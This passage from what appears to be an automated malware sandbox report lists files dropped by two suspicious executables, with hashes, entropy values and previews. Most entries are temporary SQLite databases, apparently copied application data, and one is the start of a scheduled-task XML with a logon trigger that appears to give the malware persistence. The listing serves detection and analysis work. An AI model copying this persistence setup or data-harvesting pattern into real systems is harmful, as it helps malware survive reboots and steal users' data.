                      SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                      MD5:28222628A3465C5F0D4B28F70F97F482
                      SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                      SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                      SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                      Malicious:false
                      Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                      C:\Users\user\AppData\Local\Temp\tmp6E74.tmp

                      Download File
                      Process:C:\Users\user\Desktop\l2rMtmFkD6.exe
                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                      Category:dropped
                      Size (bytes):106496
                      Entropy (8bit):1.136413900497188
                      Encrypted:false
                      SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                      MD5:429F49156428FD53EB06FC82088FD324
                      SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                      SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                      SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                      Malicious:false
                      Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                      C:\Users\user\AppData\Local\Temp\tmp6E75.tmp

                      Download File
                      Process:C:\Users\user\Desktop\l2rMtmFkD6.exe
                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                      Category:dropped
                      Size (bytes):106496
                      Entropy (8bit):1.136413900497188
                      Encrypted:false
                      SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                      MD5:429F49156428FD53EB06FC82088FD324
                      SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                      SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                      SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                      Malicious:false
                      Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                      C:\Users\user\AppData\Local\Temp\tmp6E95.tmp

                      Download File
                      Process:C:\Users\user\Desktop\l2rMtmFkD6.exe
                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                      Category:dropped
                      Size (bytes):51200
                      Entropy (8bit):0.8746135976761988
                      Encrypted:false
                      SSDEEP:96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
                      MD5:9E68EA772705B5EC0C83C2A97BB26324
                      SHA1:243128040256A9112CEAC269D56AD6B21061FF80
                      SHA-256:17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
                      SHA-512:312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
                      Malicious:false
                      Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                      C:\Users\user\AppData\Local\Temp\tmp6E96.tmp

                      Download File
                      Process:C:\Users\user\Desktop\l2rMtmFkD6.exe
                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                      Category:dropped
                      Size (bytes):51200
                      Entropy (8bit):0.8746135976761988
                      Encrypted:false
                      SSDEEP:96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
                      MD5:9E68EA772705B5EC0C83C2A97BB26324
                      SHA1:243128040256A9112CEAC269D56AD6B21061FF80
                      SHA-256:17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
                      SHA-512:312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
                      Malicious:false
                      Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                      C:\Users\user\AppData\Local\Temp\tmp6EA6.tmp

                      Download File
                      Process:C:\Users\user\Desktop\l2rMtmFkD6.exe
                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                      Category:dropped
                      Size (bytes):51200
                      Entropy (8bit):0.8746135976761988
                      Encrypted:false
                      SSDEEP:96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
                      MD5:9E68EA772705B5EC0C83C2A97BB26324
                      SHA1:243128040256A9112CEAC269D56AD6B21061FF80
                      SHA-256:17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
                      SHA-512:312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
                      Malicious:false
                      Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                      C:\Users\user\AppData\Local\Temp\tmp6EA7.tmp

                      Download File
                      Process:C:\Users\user\Desktop\l2rMtmFkD6.exe
                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                      Category:dropped
                      Size (bytes):51200
                      Entropy (8bit):0.8746135976761988
                      Encrypted:false
                      SSDEEP:96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
                      MD5:9E68EA772705B5EC0C83C2A97BB26324
                      SHA1:243128040256A9112CEAC269D56AD6B21061FF80
                      SHA-256:17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
                      SHA-512:312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
                      Malicious:false
                      Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                      C:\Users\user\AppData\Local\Temp\tmp6EB8.tmp

                      Download File
                      Process:C:\Users\user\Desktop\l2rMtmFkD6.exe
                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                      Category:dropped
                      Size (bytes):51200
                      Entropy (8bit):0.8746135976761988
                      Encrypted:false
                      SSDEEP:96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
                      MD5:9E68EA772705B5EC0C83C2A97BB26324
                      SHA1:243128040256A9112CEAC269D56AD6B21061FF80
                      SHA-256:17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
                      SHA-512:312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
                      Malicious:false
                      Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                      C:\Users\user\AppData\Local\Temp\tmp6EB9.tmp

                      Download File
                      Process:C:\Users\user\Desktop\l2rMtmFkD6.exe
                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                      Category:dropped
                      Size (bytes):51200
                      Entropy (8bit):0.8746135976761988
                      Encrypted:false
                      SSDEEP:96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
                      MD5:9E68EA772705B5EC0C83C2A97BB26324
                      SHA1:243128040256A9112CEAC269D56AD6B21061FF80
                      SHA-256:17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
                      SHA-512:312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
                      Malicious:false
                      Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                      C:\Users\user\AppData\Local\Temp\tmp6ECA.tmp

                      Download File
                      Process:C:\Users\user\Desktop\l2rMtmFkD6.exe
                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                      Category:dropped
                      Size (bytes):196608
                      Entropy (8bit):1.121297215059106
                      Encrypted:false
                      SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                      MD5:D87270D0039ED3A5A72E7082EA71E305
                      SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                      SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                      SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                      Malicious:false
                      Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                      C:\Users\user\AppData\Local\Temp\tmp6ECB.tmp

                      Download File
                      Process:C:\Users\user\Desktop\l2rMtmFkD6.exe
                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                      Category:dropped
                      Size (bytes):196608
                      Entropy (8bit):1.121297215059106
                      Encrypted:false
                      SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                      MD5:D87270D0039ED3A5A72E7082EA71E305
                      SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                      SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                      SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                      Malicious:false
                      Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                      C:\Users\user\AppData\Local\Temp\tmp6EDB.tmp

                      Download File
                      Process:C:\Users\user\Desktop\l2rMtmFkD6.exe
                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                      Category:dropped
                      Size (bytes):196608
                      Entropy (8bit):1.121297215059106
                      Encrypted:false
                      SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                      MD5:D87270D0039ED3A5A72E7082EA71E305
                      SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                      SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                      SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                      Malicious:false
                      Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                      C:\Users\user\AppData\Local\Temp\tmp72FD.tmp

                      Download File
                      Process:C:\Users\user\AppData\Roaming\ECcZgk.exe
                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                      Category:dropped
                      Size (bytes):106496
                      Entropy (8bit):1.136413900497188
                      Encrypted:false
                      SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                      MD5:429F49156428FD53EB06FC82088FD324
                      SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                      SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                      SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                      Malicious:false
                      Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                      C:\Users\user\AppData\Local\Temp\tmp730D.tmp

                      Download File
                      Process:C:\Users\user\AppData\Roaming\ECcZgk.exe
                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                      Category:dropped
                      Size (bytes):106496
                      Entropy (8bit):1.136413900497188
                      Encrypted:false
                      SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                      MD5:429F49156428FD53EB06FC82088FD324
                      SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                      SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                      SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                      Malicious:false
                      Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                      C:\Users\user\AppData\Local\Temp\tmp732E.tmp

                      Download File
                      Process:C:\Users\user\AppData\Roaming\ECcZgk.exe
                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                      Category:dropped
                      Size (bytes):106496
                      Entropy (8bit):1.136413900497188
                      Encrypted:false
                      SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                      MD5:429F49156428FD53EB06FC82088FD324
                      SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                      SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                      SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                      Malicious:false
                      Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                      C:\Users\user\AppData\Local\Temp\tmp733E.tmp

                      Download File
                      Process:C:\Users\user\AppData\Roaming\ECcZgk.exe
                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                      Category:dropped
                      Size (bytes):106496
                      Entropy (8bit):1.136413900497188
                      Encrypted:false
                      SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                      MD5:429F49156428FD53EB06FC82088FD324
                      SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                      SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                      SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                      Malicious:false
                      Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                      C:\Users\user\AppData\Local\Temp\tmp7D1E.tmp

                      Download File
                      Process:C:\Users\user\AppData\Roaming\ECcZgk.exe
                      File Type:XML 1.0 document, ASCII text
                      Category:dropped
                      Size (bytes):1579
                      Entropy (8bit):5.101595782645726
                      Encrypted:false
                      SSDEEP:24:2di4+S2qhlZ1Muy1my3UnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtRxvn:cgergYrFdOFzOzN33ODOiDdKrsuTXv
                      MD5:4F0D8D3BCFC5AEA89CF814AD1C19A976
                      SHA1:2F2F2DCE5C66D4C4934D28DD452CCCA80F887DFE
                      SHA-256:4008D37FE4E018E1CD1C748DDE3022784D7127113AB7FE470853D3B945232CB2
                      SHA-512:31E1CD970F0341BDD59088C814F71B5736673C926B7AFD4D09CF52805FF07AAE94FE8083623AC181217029BEEDDD216E07DD98C72717A9237FBF906F7BE6CC25
                      Malicious:false
                      Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetwor

                      C:\Users\user\AppData\Local\Temp\tmp7FA1.tmp

                      Download File
                      Process:C:\Users\user\AppData\Roaming\ECcZgk.exe
                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                      Category:dropped
                      Size (bytes):196608
                      Entropy (8bit):1.121297215059106
                      Encrypted:false
                      SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                      MD5:D87270D0039ED3A5A72E7082EA71E305
                      SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                      SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                      SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                      Malicious:false
                      Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                      C:\Users\user\AppData\Local\Temp\tmp7FB1.tmp

                      Download File
                      Process:C:\Users\user\AppData\Roaming\ECcZgk.exe
                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                      Category:dropped
                      Size (bytes):196608
                      Entropy (8bit):1.121297215059106
                      Encrypted:false
                      SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                      MD5:D87270D0039ED3A5A72E7082EA71E305
                      SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                      SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                      SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                      Malicious:false
                      Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                      C:\Users\user\AppData\Local\Temp\tmp7FC2.tmp

                      Download File
                      Process:C:\Users\user\AppData\Roaming\ECcZgk.exe
                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                      Category:dropped
                      Size (bytes):196608
                      Entropy (8bit):1.121297215059106
                      Encrypted:false
                      SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                      MD5:D87270D0039ED3A5A72E7082EA71E305
                      SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                      SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                      SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                      Malicious:false
                      Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                      C:\Users\user\AppData\Local\Temp\tmp7FD3.tmp

                      Download File
                      Process:C:\Users\user\AppData\Roaming\ECcZgk.exe
                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                      Category:dropped
                      Size (bytes):196608
                      Entropy (8bit):1.121297215059106
                      Encrypted:false
                      SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                      MD5:D87270D0039ED3A5A72E7082EA71E305
                      SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                      SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                      SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                      Malicious:false
                      Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                      C:\Users\user\AppData\Local\Temp\tmp7FE3.tmp

                      Download File
                      Process:C:\Users\user\AppData\Roaming\ECcZgk.exe
                      File Type:SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
                      Category:dropped
                      Size (bytes):98304
                      Entropy (8bit):0.08235737944063153
                      Encrypted:false
                      SSDEEP:12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
                      MD5:369B6DD66F1CAD49D0952C40FEB9AD41
                      SHA1:D05B2DE29433FB113EC4C558FF33087ED7481DD4
                      SHA-256:14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
                      SHA-512:771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
                      Malicious:false
                      Preview:SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                      C:\Users\user\AppData\Local\Temp\tmp7FF4.tmp

                      Download File
                      Process:C:\Users\user\AppData\Roaming\ECcZgk.exe
                      File Type:SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
                      Category:dropped
                      Size (bytes):98304
                      Entropy (8bit):0.08235737944063153
                      Encrypted:false
                      SSDEEP:12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
                      MD5:369B6DD66F1CAD49D0952C40FEB9AD41
                      SHA1:D05B2DE29433FB113EC4C558FF33087ED7481DD4
                      SHA-256:14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
                      SHA-512:771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
                      Malicious:false
                      Preview:SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                      C:\Users\user\AppData\Local\Temp\tmp88A7.tmp

                      Download File
                      Process:C:\Users\user\Desktop\l2rMtmFkD6.exe
                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                      Category:dropped
                      Size (bytes):40960
                      Entropy (8bit):0.8553638852307782
                      Encrypted:false
                      SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                      MD5:28222628A3465C5F0D4B28F70F97F482
                      SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                      SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                      SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                      Malicious:false
                      Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                      C:\Users\user\AppData\Local\Temp\tmp88C7.tmp

                      Download File
                      Process:C:\Users\user\Desktop\l2rMtmFkD6.exe
                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                      Category:dropped
                      Size (bytes):40960
                      Entropy (8bit):0.8553638852307782
                      Encrypted:false
                      SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                      MD5:28222628A3465C5F0D4B28F70F97F482
                      SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                      SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                      SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                      Malicious:false
                      Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                      C:\Users\user\AppData\Local\Temp\tmp8907.tmp

                      Download File
                      Process:C:\Users\user\Desktop\l2rMtmFkD6.exe
                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                      Category:dropped
                      Size (bytes):40960
                      Entropy (8bit):0.8553638852307782
                      Encrypted:false
                      SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                      MD5:28222628A3465C5F0D4B28F70F97F482
                      SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                      SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                      SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                      Malicious:false
